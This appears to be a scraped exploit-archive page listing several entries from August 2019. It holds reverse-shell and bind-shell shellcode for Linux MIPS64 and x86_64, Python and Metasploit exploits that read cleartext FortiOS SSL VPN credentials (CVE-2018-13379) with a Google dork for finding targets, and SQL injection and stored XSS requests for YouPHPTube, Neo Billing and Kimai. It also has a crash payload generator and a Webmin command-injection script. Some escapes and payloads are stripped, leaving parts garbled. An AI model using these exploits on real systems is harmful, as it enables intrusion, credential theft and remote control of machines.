157 bytes small Linux/MIPS64 reverse (localhost:4444/TCP) shell shellcode.

MD5 | 943dc4bcee3d0b33275bf2fdf8a0cb86

/*
* # Reverse shell shellcode for Linux MIPS64 (mips64el)
* # Default port: tcp/4444
* # Host: localhost
* # Date: August 19 - 2019
* # Author: Antonio de la Piedra
* # Tested on: MIPS Malta - Linux debian-mips64el 4.9.0-3-5kc-malta
* # Size: 157 bytes
* # Compile with: gcc -fno-stack-protector -z execstack main.c -o main -g
*/

#include
#include

/*
.text
.global __start
__start:

dli $s4, -3
dli $s5, -17
nor $a0,$s4,$zero
nor $a1,$s4,$zero
slti $a2,$zero,-1
li $v0,5040
syscall 0x40404

sw $v0, -32($sp)
lw $a0, -32($sp)

nor $t0,$s4,$zero
sw $t0, -12($sp)
dli $t2,0x5c11
sw $t2,-10($sp)
dli $t1,0x0101017f
sw $t1,-8($sp)
daddiu $a1,$sp,-12
nor $a2,$s5,$zero
dli $v0,5041
syscall 0x40404

nor $a1,$s4,$zero
dli $s0, -1
loop:
dli $v0,5032
syscall 0x40404
daddi $a1,$a1,-1
bne $a1,$s0,loop
dli $t0,0x69622f2f
sw $t0,-12($sp)
dli $t1,0x68732f6e
dli $t1,0x68732f6e
sw $t1,-8($sp)
sw $zero,-4($sp)
daddiu $a0,$sp,-12
slti $a1,$zero,-1
slti $a2,$zero,-1
dli $v0,5057
syscall 0x40404
.align 8
*/

unsigned char code[] =
"xfdxffx14x24"
"xfdxffx14x24"
"xefxffx15x24"
"x27x20x80x02"
"x27x28x80x02"
"xffxffx06x28"
"xb0x13x02x24"
"x0cx01x01x01"
"xe0xffxa2xaf"
"xe0xffxa4x8f"
"x27x60x80x02"
"xf4xffxacxaf"
"x11x5cx0ex24"
"xf6xffxaexaf"
"x01x01x0dx3c"
"x7fx01xadx35"
"xf8xffxadxaf"
"xf4xffxa5x67"
"x27x30xa0x02"
"xb1x13x02x24"
"x0cx01x01x01"
"x27x28x80x02"
"xffxffx10x24"
"xa8x13x02x24"
"x0cx01x01x01"
"xffxffxa5x60"
"xfcxffxb0x14"
"x62x69x0cx3c"
"x2fx2fx8cx35"
"xf4xffxacxaf"
"x73x68x0dx3c"
"x6ex2fxadx35"
"xf8xffxadxaf"
"xfcxffxa0xaf"
"xf4xffxa4x67"
"xffxffx05x28"
"xffxffx06x28"
"xc1x13x02x24"
"x0cx01x01x01";

int main(int argc, char ** argv)
{
void(*s)(void);

printf("Shellcode Length: %dn", strlen(code));

s = code;
s();

}

Source

129 bytes small Linux/x86_64 bind (4444/TCP) shell (/bin/sh) + password (pass) shellcode.

MD5 | 4f69a9a7b34a1231bc105cb3374d328e

/*
; Title : Linux/x86_64 - Bind Shell (/bin/sh) with Password (configurable) (129 bytes)
; Date : 2019-08-18
; Author : Gonçalo Ribeiro (@goncalor)
; Website : goncalor.com
; SLAE64-ID : 1635

global _start

%define pass "pass"
%define port 0x5c11 ; htons(4444)

_start:
jmp real_start
password: db pass
pass_len: db $-password

real_start:
socket:
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; __NR_socket = 41
; On success, a file descriptor for the new socket is returned

push 41
pop rax
push 2
pop rdi
push 1
pop rsi
cdq ; copies rax's bit 31 to all bits of edx (zeroes rdx)
syscall

push rax
pop rdi

bind:
; server.sin_family = AF_INET; short
; server.sin_port = htons(4444); unsigned short
; server.sin_addr.s_addr = INADDR_ANY; unsigned long
; bzero(&server.sin_zero, 8);
;
; https://beej.us/guide/bgnet/html/multi/sockaddr_inman.html
; struct sockaddr_in {
; short sin_family;
; unsigned short sin_port;
; struct in_addr sin_addr;
; char sin_zero[8];
; };
;
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; INADDR_ANY = 0
; AF_INET = 2
; __NR_bind = 49
; On success, zero is returned

xor eax, eax ; shorter and will still zero the upper bytes
push rax ; sin_zero
push ax
push ax ; sin_addr
push word port
push word 2

; bind
add al, 49
push rsp
pop rsi
add dl, 16 ; sizeof(sockaddr_in)
syscall

listen:
; listen(sock, 2)
; __NR_listen = 50
; On success, zero is returned

mov al, 50
xor esi, esi
mov sil, 2
syscall

accept:
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
; __NR_accept = 43
; On success, a file descriptor is returned

mov al, 43
xor esi, esi
;xor rdx, rdx ; already zeroed
syscall

push rax

;close:
; close(sock)
; __NR_close = 3
; returns zero on success

; closing is not strictly necessary
;mov al, 3
;syscall

dup2:
; dup2(new, 0);
; dup2(new, 1);
; dup2(new, 2);
; __NR_dup2 = 33
; On success, return the new file descriptor

pop rdi ; "new" was pushed in accept()
push 2
pop rsi

dup2_loop:
mov al, 33
syscall
dec esi
jns dup2_loop

read_password:
; read(int fd, void *buf, size_t count)
; On success, the number of bytes read is returned

;xor eax, eax ; already done by dup2
;rdi = "new" ; already done in dup2
push rax
push rax ; create space for "buf" in the stack
push rsp
pop rsi ; rsi = *buf
mov dl, 16
syscall

compare_password:
xor ecx, ecx
lea rdi, [rel pass_len]
mov cl, [rdi]
sub rdi, rcx
cld
repz cmpsb
jne exit

execve:
; execve(const char *path, char *const argv[], char *const envp[])
; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding)
; rsi, argv = (char**) (/bin//sh, 0x00)
; rdx, envp = &0x00

xor eax, eax
push rax
push rsp
pop rdx ; *rdx = &0x00

mov rsi, 0x68732f2f6e69622f ; rax2 -S $(echo /bin//sh | rev)
push rsi
push rsp
pop rdi ; rdi = (char*) /bin//sh

push rax
push rdi
push rsp
pop rsi ; rsi = (char**) (/bin//sh, 0x00)

mov al, 59
syscall

exit:
;xor eax, eax ; upper bytes are zero after read
mov al, 60
syscall
*/


#include
#include

char code[] =
"xebx05x70x61x73x73x04x6ax29x58x6ax02x5fx6ax01x5ex99x0f"
"x05x50x5fx31xc0x50x66x50x66x50x66x68x11x5cx66x6ax02x04"
"x31x54x5ex80xc2x10x0fx05xb0x32x31xf6x40xb6x02x0fx05xb0"
"x2bx31xf6x0fx05x50x5fx6ax02x5exb0x21x0fx05xffxcex79xf8"
"x50x50x54x5exb2x10x0fx05x31xc9x48x8dx3dxadxffxffxffx8a"
"x0fx48x29xcfxfcxf3xa6x75x1ax31xc0x50x54x5ax48xbex2fx62"
"x69x6ex2fx2fx73x68x56x54x5fx50x57x54x5exb0x3bx0fx05xb0"
"x3cx0fx05";

int main() {
printf("length: %lun", strlen(code));
((int(*)()) code)();
}

Source

FortiOS versions 5.6.3 through 5.6.7 and 6.0.0 through 6.0.4 suffer from a credential disclosure vulnerability.

MD5 | a022f0e2fde0c635d9836c8aef10e213

# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
# Tested on: 5.6.6
# CVE : CVE-2018-13379

# Exploit SSLVPN Fortinet - FortiOs
#!/usr/bin/env python
import requests, sys, time
import urllib3
urllib3.disable_warnings()


def leak(host, port):
print("[!] Leak information...")
try:
url = "https://"+host+":"+port+"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
r=requests.get(url, headers=headers, verify=False, stream=True)
img=r.raw.read()
if "var fgt_lang =" in str(img):
with open("sslvpn_websession_"+host+".dat", 'w') as f:
f.write(img)
print("[>] Save to file ....")
parse(host)
print("n")
return True
else:
return False
except requests.exceptions.ConnectionError:
return False
def is_character_printable(s):
return all((ord(c) = 32) for c in s)

def is_printable(byte):
if is_character_printable(byte):
return byte
else:
return '.'

def read_bytes(host, chunksize=8192):
print("[>] Read bytes from > " + "sslvpn_websession"+host+".dat")
with open("sslvpn_websession_"+host+".dat", "rb") as f:
while True:
chunk = f.read(chunksize)
if chunk:
for b in chunk:
yield b
else:
break
def parse(host):
print("[!] Parsing Information...")
memory_address = 0
ascii_string = ""
for byte in read_bytes(host):
ascii_string = ascii_string + is_printable(byte)
if memory_address%61 == 60:
if ascii_string!=".............................................................":
print ascii_string
ascii_string = ""
memory_address = memory_address + 1

def check(host, port):
print("[!] Check vuln...")
uri = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
try:
r = requests.get("https://" + host + ":" + port + uri, verify=False)
if(r.status_code == 200):
return True
elif(r.status_code == 404):
return False
else:
return False
except:
return False
def main(host, port):
print("[+] Start exploiting....")
vuln = check(host, port)
if(vuln):
print("[+] Target is vulnerable!")
bin_file = leak(host, port)
else:
print("[X] Target not vulnerable.")

if __name__ == "__main__":

if(len(sys.argv) < 3):
print("Use: python {} ip/dns port".format(sys.argv[0]))
else:
host = sys.argv[1]
port = sys.argv[2]
main(host, port)

Source

This Metasploit module exploits FortiOS versions 5.6.3 through 5.6.7 and 6.0.0 through 6.0.4 to leverage a credential disclosure vulnerability by reading the /dev/cmdb/sslvpn_websession file.

MD5 | 956f30465640700e922f5cf3e4a9bdf6

# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
# Tested on: 5.6.6
# CVE : CVE-2018-13379

require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Post::File
def initialize(info = {})
super(update_info(info,
'Name' => 'SSL VPN FortiOs - System file leak',
'Description' => %q{
FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.
This exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).
This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
},
'References' =>
[
[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ]
],
'Author' => [ 'lynx (Carlos Vieira)' ],
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'RPORT' => 443,
'SSL' => true
},
))

end


def run()
print_good("Checking target...")
res = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'})

if res && res.code == 200
print_good("Target is Vulnerable!")
data = res.body
current_host = datastore['RHOST']
filename = "msf_sslwebsession_"+current_host+".bin"
File.delete(filename) if File.exist?(filename)
file_local_write(filename, data)
print_good("Parsing binary file.......")
parse()
else
if(res && res.code == 404)
print_error("Target not Vulnerable")
else
print_error("Ow crap, try again...")
end
end
end
def parse()
current_host = datastore['RHOST']

fileObj = File.new("msf_sslwebsession_"+current_host+".bin", "r")
words = 0
while (line = fileObj.gets)
printable_data = line.gsub(/[^[:print:]]/, '.')
array_data = printable_data.scan(/.{1,60}/m)
for ar in array_data
if ar != "............................................................"
print_good(ar)
end
end
#print_good(printable_data)

end
fileObj.close
end
end

Source

YouPHPTube version 7.2 suffers from a remote SQL injection vulnerability in userCreate.json.php.

MD5 | 0c5a7e8e6f6f45c7826e5a19a22f0dea

# Exploit Title: YouPHPTube < 7.3 SQL Injection
# Google Dork: /
# Date: 19.08.2019
# Exploit Author: Fabian Mosch, r-tec IT Security GmbH
# Vendor Homepage: https://www.youphptube.com/
# Software Link: https://github.com/YouPHPTube/YouPHPTube
# Version: < 7.3
# Tested on: Linux/Windows
# CVE : CVE-2019-14430

The parameters "User" as well as "pass" of the user registration function are vulnerable to SQL injection vulnerabilities. By submitting an HTTP POST request to the URL "/objects/userCreate.json.php" an attacker can access the database and read the hashed credentials of an administrator for example.

Example Request:

POST /objects/userCreate.json.php HTTP/1.1
Host: vulnerablehost.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
[SomeHeaders and Cookies]

user=tes'INJECTHERE&pass=test'INJECTHERE &email=test%40example.com&name=test&captcha=xxxxx

Methods for DB-Extraction are:


- Boolean-based blind

- Error-based

- AND/OR time-based blind


The vulnerability was fixed with this commit:
https://github.com/YouPHPTube/YouPHPTube/commit/891843d547f7db5639925a67b7f2fd66721f703a

Source

The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system.

MD5 | dc129218c58f33b7c68e4cb7a34ecd6a

Source

Neo Billing version 3.5 suffers from a persistent cross site scripting vulnerability.

MD5 | 7d47b4f46e7a051cb9a4041134f8126a

# Exploit Title: Neo Billing 3.5 - Stored Cross Site Scripting Vulnerability
# Date: 18.8.2019.
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547
# Version: 3.5
# CWE : CWE-79

[Description]

# Neo Billing os an accounting, invoicing and CRM PHP script, with over 500 installations.
# Due to improper input fields data filtering, version 3.5 (and possibly previous versions), are affected by a stored XSS vulnerability.

[Proof of Concept]

# 1. Authorization as customer (regular user account) [//host/neo/crm/user/login]
# 2. Closing an input field tag and injecting code into 'Subject' or 'Description' text fields [//host/neo/crm/tickets/addticket]
# 3. The code is stored [//host/neo/crm/tickets] ∨ [//host/neo/crm/tickets/thread/?id=ticketid]

[Example paylods]

# Example payload: ">
# Example payload: ">alert(document.cookie)

[POST Request]

POST /neo/crm/tickets/addticket HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: //host/neo/crm/tickets/addticket
Content-Type: multipart/form-data; boundary=---------------------------899768029113033755249127523
Content-Length: 694
Cookie: __cfduid=d99e93624fe63d5aa953bf59cd28cdafe1566123585; ci_sessions=nel35vfb2hi5f9tt29l43ogn36hdmilj
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="title"

">alert('XSS')
-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="content"

">alert('XSS')


-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="userfile"; filename=""
Content-Type: application/octet-stream


-----------------------------899768029113033755249127523--

Source

Kimai version 2 suffers from a persistent cross site scripting vulnerability.

MD5 | d467918811040b33c88487e63e4fa7b0

# Exploit Title: Kimai 2- persistent cross-site scripting (XSS)
# Date: 07/15/2019
# Exploit Author: osamaalaa
# Vendor Homepage: [link]
# Software Link: https://github.com/kevinpapst/kimai2
# Fixed on Github : https://github.com/kevinpapst/kimai2/pull/962
# Version: 2

1-Normal user will try to add timesheet from this link http://localhost/index.php/en/timesheet/create

2-Add this payload "> in the description

3-Save The changes

4-refresh and we have alert pop up!

The Request POC :

POST /index.php/en/timesheet/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 392
Connection: close
Referer: http://localhost
Cookie: PHPSESSID=auehoprhqk3qspncs5s08ucobv

timesheet_edit_form[begin]=2019-08-17 13:02&timesheet_edit_form[end]=2019-08-18 00:00&timesheet_edit_form[customer]=12&timesheet_edit_form[project]=24&timesheet_edit_form[activity]=27&timesheet_edit_form[description]= ">&timesheet_edit_form[tags]=&timesheet_edit_form[_token]=19Owg2YgIMPFUcEP9NVibhqEpKwkwhVt5j-BTJysyK0

Source

RAR Password Recovery version 1.80 suffers from a user name and registration code denial of service vulnerability.

MD5 | c8006c83d8c82155250a442fd9ef4c2b

# Exploit Title: RAR Password Recovery v1.80 Denial of Service Exploit
# Date: 16.08.2019
# Vendor Homepage:https://www.top-password.com/
# Software Link: https://www.top-password.com/download/RARPRSetup.exe
# Exploit Author: Achilles
# Tested Version: v1.80
# Tested on: Windows 7 x64
# Windows XP SP3


# 1.- Run python code :RAR Password Recovery.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open RAR Password Recovery and Click 'Register'
# 4.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
# 5.- Click 'OK' and you will see a crash.



#!/usr/bin/env python
buffer = "x41" * 6000

try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

Source

Webmin unauthenticated remote command execution exploit that identifies whether or not a target is vulnerable.

MD5 | d3f8ab6c772881a15aae824b15be9760

#!/bin/sh
#
# CVE-2019-15107 Webmin Unauhenticated Remote Command Execution
# based on Metasploit module https://www.exploit-db.com/exploits/47230
# Original advisory: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
# Alternative advisory (spanish): https://blog.nivel4.com/noticias/vulnerabilidad-de-ejecucion-de-comandos-remotos-en-webmin
#
# Fernando A. Lagos B. (Zerial)
# https://blog.zerial.org
# https://blog.nivel4.com
#
# The script sends a flag by a echo command then grep it. If match, target is vulnerable.
#
# Usage: sh CVE-2019-15107.sh https://target:port
# Example: sh CVE-2019-15107.sh https://localhost:10000
# output: Testing for RCE (CVE-2019-15107) on https://localhost:10000: VULNERABLE!
#

FLAG="f3a0c13c3765137bcde68572707ae5c0"
URI=$1;

echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks $URI'/password_change.cgi' -d 'user=wheel&pam=&expired=2&old=id|echo '$FLAG'&new1=wheel&new2=wheel' -H 'Cookie: redirect=1; testing=1; sid=x; sessiontest=1;' -H "Content-Type: application/x-www-form-urlencoded" -H 'Referer: '$URI'/session_login.cgi'|grep $FLAG>/dev/null 2>&1

if [ $? -eq 0 ];
then
echo '33[0;31mVULNERABLE!33[0m'
else
echo '33[0;32mOK! (target is not vulnerable)33[0m'
fi
#EOF

Source